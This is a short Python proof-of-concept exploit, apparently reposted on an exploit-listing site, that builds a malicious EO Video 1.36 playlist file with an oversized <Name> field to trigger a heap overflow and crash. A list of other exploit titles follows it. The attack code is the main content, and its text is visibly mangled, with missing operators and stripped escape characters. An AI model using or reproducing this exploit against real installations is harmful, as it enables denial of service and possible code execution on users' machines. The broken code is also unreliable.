#!/usr/bin/python
# --------------------------------------------------------------
# EO Video v1.36 Heap Overflow local PoC/DoS exploit
# *.eop playlist file in <Name> buffer overflow
# Other versions may be vulnerable too...
# --------------------------------------------------------------
# Vulnerability discovered and coded by Muris Kurgas aka j0rgan
# jorganwd [at] gmail [dot] com
# --------------------------------------------------------------
#
# Who uses this crap of player anyway? :)
# --------------------------------------------------------------
# EAX 42424242
# EDX 42424242
# -------------------------------------------------------------- import os bafer = 'x41'* 700 'x42' * 4 print "Spit me out, all bright and shiny! :)"
fileHandle = open ( 'plejlista.eop', 'w' )
fileHandle.write ('<EOPlaylist>n<Playlist>n<FolderList>n<Folder>n<Name>nesto</Name>n<TrueFrequency>1</TrueFrequency>n ')
fileHandle.write ('</Folder>n<Folder>n<Name>nesto</Name>n<TrueFrequency>1</TrueFrequency>n</Folder>n</FolderList>n<ProjectElement>n ')
fileHandle.write ('<Name>' bafer '</Name>')
fileHandle.write ('<StartTime>0</StartTime>n<EndTime>0</EndTime>n<MediaSize>n<Width>-1</Width>n<Height>-1</Height>n</MediaSize>n ')
fileHandle.write ('<State>30216</State>n<FolderPositionIndex>0</FolderPositionIndex>n ')
fileHandle.write ('</ProjectElement>n</Playlist>n</EOPlaylist>n')
fileHandle.close ()
【EO Video 1.36 Local Heap Overflow DOS / PoC】相关文章:
★ Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
★ DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit
★ HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit
★ webEdition CMS (we_objectID) Blind SQL Injection Exploit
★ Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
★ Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
★ Dana IRC 1.4a Remote Buffer Overflow Exploit
★ minb 0.1.0 Remote Code Execution Exploit
★ CodeDB (list.php lang) Local File Inclusion Vulnerability